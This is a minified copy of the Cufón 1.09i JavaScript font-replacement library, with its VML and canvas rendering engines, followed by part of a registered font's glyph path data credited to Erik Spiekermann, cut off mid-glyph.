/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return a(i,/(?:em|ex|%)$|^[a-z-]+$/i.test(j)?"1em":j)}function a(l,m){if(m==="0"){return 0}if(/px$/i.test(m)){return parseFloat(m)}var k=l.style.left,j=l.runtimeStyle.left;l.runtimeStyle.left=l.currentStyle.left;l.style.left=m.replace("%","em");var i=l.style.pixelLeft;l.style.left=k;l.runtimeStyle.left=j;return i}function f(l,k,j,n){var i="computed"+n,m=k[i];if(isNaN(m)){m=k.get(n);k[i]=m=(m=="normal")?0:~~j.convertFrom(a(l,m))}return m}var g={};function d(p){var q=p.id;if(!g[q]){var n=p.stops,o=document.createElement("cvml:fill"),i=[];o.type="gradient";o.angle=180;o.focus="0";o.method="sigma";o.color=n[0][1];for(var m=1,l=n.length-1;m<l;++m){i.push(n[m][0]*100+"% "+n[m][1])}o.colors=i.join(",");o.color2=n[l][1];g[q]=o}return g[q]}return function(ac,G,Y,C,K,ad,W){var n=(G===null);if(n){G=K.alt}var I=ac.viewBox;var p=Y.computedFontSize||(Y.computedFontSize=new Cufon.CSS.Size(c(ad,Y.get("fontSize"))+"px",ac.baseSize));var y,q;if(n){y=K;q=K.firstChild}else{y=document.createElement("cufon");y.className="cufon cufon-vml";y.alt=G;q=document.createElement("cufoncanvas");y.appendChild(q);if(C.printable){var Z=document.createElement("cufontext");Z.appendChild(document.createTextNode(G));y.appendChild(Z)}if(!W){y.appendChild(document.createElement("cvml:shape"))}}var ai=y.style;var R=q.style;var l=p.convert(I.height),af=Math.ceil(l);var V=af/l;var P=V*Cufon.CSS.fontStretch(Y.get("fontStretch"));var U=I.minX,T=I.minY;R.height=af;R.top=Math.round(p.convert(T-ac.ascent));R.left=Math.round(p.convert(U));ai.height=p.convert(ac.height)+"px";var F=Y.get("color");var ag=Cufon.CSS.textTransform(G,Y).split("");var L=ac.spacing(ag,f(ad,Y,p,"letterSpacing"),f(ad,Y,p,"wordSpacing"));if(!L.length){return null}var k=L.total;var x=-U+k+(I.width-L[L.length-1]);var ah=p.convert(x*P),X=Math.round(ah);var O=x+","+I.height,m;var J="r"+O+"ns";var u=C.textGradient&&d(C.textGradient);var o=ac.glyphs,S=0;var H=C.textShadow;var ab=-1,aa=0,w;while(w=ag[++ab]){var D=o[ag[ab]]||ac.missingGlyph,v;if(!D){continue}if(n){v=q.childNodes[aa];while(v.firstChild){v.removeChild(v.firstChild)}}else{v=document.createElement("cvml:shape");q.appendChild(v)}v.stroked="f";v.coordsize=O;v.coordorigin=m=(U-S)+","+T;v.path=(D.d?"m"+D.d+"xe":"")+"m"+m+J;v.fillcolor=F;if(u){v.appendChild(u.cloneNode(false))}var ae=v.style;ae.width=X;ae.height=af;if(H){var s=H[0],r=H[1];var B=Cufon.CSS.color(s.color),z;var N=document.createElement("cvml:shadow");N.on="t";N.color=B.color;N.offset=s.offX+","+s.offY;if(r){z=Cufon.CSS.color(r.color);N.type="double";N.color2=z.color;N.offset2=r.offX+","+r.offY}N.opacity=B.opacity||(z&&z.opacity)||1;v.appendChild(N)}S+=L[aa++]}var M=v.nextSibling,t,A;if(C.forceHitArea){if(!M){M=document.createElement("cvml:rect");M.stroked="f";M.className="cufon-vml-cover";t=document.createElement("cvml:fill");t.opacity=0;M.appendChild(t);q.appendChild(M)}A=M.style;A.width=X;A.height=af}else{if(M){q.removeChild(M)}}ai.width=Math.max(Math.ceil(p.convert(k*P)),0);if(h){var Q=Y.computedYAdjust;if(Q===undefined){var E=Y.get("lineHeight");if(E=="normal"){E="1em"}else{if(!isNaN(E)){E+="em"}}Y.computedYAdjust=Q=0.5*(a(ad,E)-parseFloat(ai.height))}if(Q){ai.marginTop=Math.ceil(Q)+"px";ai.marginBottom=Q+"px"}}return y}})());Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var X=n.getContext("2d"),D=j/A.height;X.scale(D,D*M);X.translate(-u,-B);X.save();function T(){var x=V.glyphs,ab,l=-1,g=-1,y;X.scale(G,1);while(y=Z[++l]){var ab=x[Z[l]]||V.missingGlyph;if(!ab){continue}if(ab.d){X.beginPath();if(ab.code){c(ab.code,X)}else{ab.code=d("m"+ab.d,X)}X.fill()}X.translate(E[++g],0)}X.restore()}if(z){for(var U=z.length;U--;){var F=z[U];X.save();X.fillStyle=F.color;X.translate.apply(X,L[U]);T()}}var q=t.textGradient;if(q){var v=q.stops,p=X.createLinearGradient(0,A.minY,0,A.maxY);for(var U=0,R=v.length;U<R;++U){p.addColorStop.apply(p,v[U])}X.fillStyle=p}else{X.fillStyle=P.get("color")}T();return s}})());

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * 1993 Erik Spiekermann
 * 
 * Manufacturer:
 * Erik Spiekermann
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"109,-255r22,0r80,156r-27,0r-64,-126r-65,126r-26,0","w":239},{"d":"0,27r180,0r0,18r-180,0r0,-18","w":180},{"d":"122,-247r82,247r-33,0r-24,-76r-92,0r-24,76r-30,0r83,-247r38,0xm140,-100r-38,-121r-39,121r77,0","w":205},{"d":"138,-21v-26,40,-109,38,-109,-25r0,-132r28,-5r0,129v-1,55,67,38,78,4r0,-127r28,-5r0,131v0,20,2,30,12,39r-18,20v-10,-10,-16,-15,-19,-29","w":196},{"d":"100,-239v77,0,91,90,25,110r-4,2v27,12,58,25,56,62v-2,45,-34,70,-81,70v-46,0,-80,-21,-80,-65v0,-36,25,-53,51,-64v-24,-10,-43,-27,-43,-56v0,-39,32,-59,76,-59xm96,-219v-46,0,-60,53,-21,71v7,3,14,9,25,13v24,-13,42,-22,42,-48v0,-23,-20,-36,-46,-36xm98,-15v51,0,69,-66,22,-83v-8,-3,-20,-10,-36,-17v-20,11,-39,22,-39,53v0,29,23,47,53,47"},{"d":"97,-185v104,0,85,154,32,203v-27,25,-60,50,-104,57r-14,-18v61,-12,105,-48,123,-101v-46,34,-122,4,-118,-60v3,-50,32,-81,81,-81xm95,-162v-46,-4,-61,65,-36,97v22,28,88,16,84,-31v-3,-36,-13,-63,-48,-66"},{"d":"4,53v21,-9,28,-28,27,-59r0,-172r28,-6v-3,72,5,155,-5,220v-6,17,-20,28,-36,35xm23,-235v0,-12,10,-22,22,-22v12,0,22,10,22,22v0,12,-9,22,-22,22v-12,0,-23,-9,-22,-22","w":90},{"d":"89,-183v28,0,56,20,79,2r18,18v-11,9,-27,13,-43,8v27,37,-1,92,-49,88v-17,7,-28,8,-32,21v0,14,29,9,43,9v39,0,63,13,63,47v0,40,-31,57,-72,57v-47,1,-88,-16,-74,-65r30,-2v-17,26,10,45,42,45v25,0,43,-7,43,-31v0,-56,-106,0,-106,-54v0,-19,13,-24,32,-31v-22,-7,-40,-24,-40,-51v0,-39,25,-61,66,-61xm121,-124v0,-24,-8,-36,-33,-35v-23,0,-34,12,-34,36v0,23,12,35,35,35v22,0,32,-12,32,-36","w":186},{"d":"30,0r-4,-258r28,-5v5,31,5,74,3,109v26,-36,109,-43,109,25r0,129r-28,0r0,-124v1,-56,-64,-30,-80,-3r0,127r-28,0","w":194},{"d":"18,-123v-5,-96,87,-161,166,-107r-16,19v-13,-11,-25,-15,-47,-15v-56,0,-67,48,-71,108v-6,79,64,122,122,82r16,20v-17,12,-41,20,-68,20v-69,0,-99,-55,-102,-127","w":198},{"d":"136,-197v-2,55,-72,54,-54,117r-24,0v-15,-53,21,-73,46,-100v19,-52,-51,-55,-78,-29r-12,-20v35,-30,124,-32,122,32xm73,5v-14,0,-25,-11,-25,-25v0,-13,11,-24,24,-24v13,0,25,11,25,24v0,13,-11,25,-24,25","w":154},{"d":"19,-123v0,-104,97,-162,171,-102r-14,18v-18,-12,-28,-19,-53,-19v-56,-1,-72,48,-72,104v0,59,18,101,78,101v16,0,28,-3,39,-9r0,-75r-50,0r-6,-25r83,0r0,115v-17,12,-42,19,-69,19v-70,-1,-107,-52,-107,-127","w":224},{"d":"45,-247r44,0r54,205v15,-72,37,-137,56,-205r43,0r22,247r-30,0r-16,-223r-63,223r-25,0r-61,-224r-17,224r-28,0","w":287},{"w":81},{"d":"-1,28v26,-12,36,-27,36,-69r0,-206r29,0r-1,240v-7,28,-21,42,-49,53","w":97},{"d":"1,-261r23,-9r108,276r-23,9","w":133},{"d":"58,-71r-22,0r-6,-176r35,-5xm48,-42v11,0,21,10,21,22v0,12,-9,23,-21,23v-12,0,-22,-10,-22,-23v0,-12,10,-22,22,-22","w":95},{"d":"17,-88v0,-73,75,-125,121,-72r-1,-103r28,5v3,84,-7,186,6,258v-17,0,-35,5,-33,-18v-12,13,-24,21,-48,21v-49,0,-73,-38,-73,-91xm91,-21v23,0,38,-10,46,-25r0,-95v-10,-12,-21,-19,-44,-18v-34,2,-45,31,-45,70v0,38,7,67,43,68","w":196},{"d":"177,-179v-1,43,-24,68,-69,67v34,32,55,73,82,112r-37,0v-20,-38,-45,-79,-76,-108v-4,-2,-8,-4,-14,-4r0,112r-30,0r0,-247v74,-2,145,-3,144,68xm147,-180v-1,-39,-39,-45,-84,-42r0,92v49,3,85,-4,84,-50","w":205},{"d":"25,0v10,-73,7,-180,1,-258r28,-5v6,30,4,68,4,104v15,-15,25,-24,51,-24v51,2,70,39,70,91v0,53,-20,93,-72,96v-19,0,-40,-11,-49,-23v-1,9,-1,12,-5,19r-28,0xm103,-158v-20,0,-37,11,-45,24r0,92v8,11,26,21,44,21v38,-1,45,-32,45,-73v1,-39,-9,-64,-44,-64","w":196},{"d":"-1,-111r175,0r0,21r-175,0r0,-21","w":173},{"d":"24,-264r59,0r0,320r-59,0r0,-21r33,0r0,-277r-33,0r0,-22","w":93},{"d":"30,0v-3,-58,7,-129,-6,-177r27,-7v2,9,7,16,7,27v17,-29,83,-39,94,3v24,-37,102,-44,102,19r0,135r-29,0r0,-132v-3,-48,-55,-20,-70,1r0,131r-29,0r0,-127v2,-48,-52,-29,-69,-7r0,134r-27,0","w":282},{"d":"2,-178r29,-6r51,154v13,-53,33,-99,49,-149r30,0r-67,181r-28,0","w":168},{"d":"168,-181v0,36,-27,46,-51,60r58,57v7,-13,6,-35,6,-56r25,0v0,31,-3,55,-13,75r45,45r-37,0r-24,-23v-35,44,-158,39,-154,-38v2,-38,25,-49,50,-63v-18,-17,-35,-29,-35,-55v0,-36,28,-57,64,-57v39,0,66,18,66,55xm103,-216v-37,-2,-45,45,-19,64v4,4,10,9,17,15v22,-12,37,-19,37,-44v0,-20,-15,-34,-35,-35xm90,-109v-52,19,-46,92,17,92v24,0,45,-10,54,-23","w":247},{"d":"104,-220r-9,17r-81,-36r16,-28","w":121},{"d":"69,-242r-33,0r0,277r33,0r0,21r-59,0r0,-320r59,0r0,22","w":93},{"d":"231,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v1,11,-8,17,-17,18xm388,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm336,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm284,-81v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-8,17,-17,18xm84,-167v-11,0,-18,-7,-18,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v1,11,-6,18,-16,18xm113,-210v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,17,8,17,18v0,10,-7,17,-17,17xm54,-125v-10,0,-18,-7,-18,-17v0,-10,7,-18,17,-18v11,0,18,7,18,18v0,10,-7,17,-17,17xm24,-82v-10,0,-18,-8,-18,-18v0,-10,7,-17,17,-17v10,0,18,7,18,17v0,10,-7,18,-17,18xm75,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-8,18,-17,18xm179,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v26,0,21,35,0,35xm127,-81v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v1,11,-8,17,-17,18xm84,-32v10,0,16,7,16,17v0,10,-7,18,-17,18v-10,0,-17,-8,-17,-18v0,-10,8,-17,18,-17xm113,10v10,0,17,8,17,18v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18xm54,-75v10,0,17,8,17,18v0,10,-8,17,-18,17v-10,0,-17,-7,-17,-17v0,-11,7,-18,18,-18","w":411},{"d":"32,-179v-4,-49,9,-82,52,-82v16,0,28,4,39,11r-10,20v-18,-14,-55,-14,-51,23r0,28r50,0r-9,21r-41,0r0,158r-30,0r0,-158r-17,0r0,-21r17,0","w":105},{"d":"82,-133v39,0,89,48,109,-1r12,17v-11,15,-21,32,-46,32v-38,0,-91,-49,-108,1r-12,-18v12,-14,20,-31,45,-31","w":239},{"d":"61,-42v-3,27,21,29,41,23r3,18v-30,15,-72,7,-72,-34r0,-123r-23,0r0,-21r23,0v-1,-17,3,-31,3,-46r30,-6v-2,17,-5,33,-4,52r45,0r-9,21r-37,0r0,116","w":115},{"d":"125,-111v13,-67,-62,-53,-87,-29r-14,-20v47,-35,141,-39,129,44v3,35,-14,89,13,103r-15,20v-12,-3,-20,-15,-24,-26v-27,37,-112,31,-110,-27v2,-50,50,-67,108,-65xm124,-91v-38,-4,-75,3,-75,42v0,49,65,35,74,5","w":182},{"w":81},{"d":"28,-272r24,0r0,278r-24,0r0,-278","w":79},{"d":"70,-223r-47,0r0,-24r117,0r0,24r-46,0r0,124r-24,0r0,-124xm170,-247r38,0r44,113r45,-113r36,0r0,148r-23,0r-1,-124r-49,124r-16,0r-50,-124r0,124r-24,0r0,-148","w":356},{"d":"10,-247r31,0r45,220r47,-220r33,0r47,220r45,-220r30,0r-57,247r-38,0r-44,-207r-43,207r-38,0","w":297},{"d":"50,-85v-10,63,59,84,97,49r11,18v-15,12,-35,22,-61,22v-53,0,-79,-40,-79,-95v0,-54,27,-93,75,-93v52,0,72,40,69,99r-112,0xm132,-106v1,-34,-9,-55,-41,-56v-26,0,-40,19,-41,56r82,0","w":182},{"d":"8,-175r28,-10r48,161r46,-155r32,0r-71,210v-10,21,-23,37,-48,43r-8,-19v25,-9,35,-27,41,-55r-12,1v-14,-63,-38,-117,-56,-176","w":168},{"d":"46,-77r-35,0r0,-23r39,0r7,-55r-35,0r0,-24r38,0r11,-76r24,0r-10,76r45,0r11,-76r24,0r-11,76r35,0r0,24r-38,0r-8,55r36,0r0,23r-39,0r-11,77r-24,0r11,-77r-46,0r-11,77r-24,0xm127,-155r-46,0r-7,55r45,0","w":200},{"d":"55,-129v-62,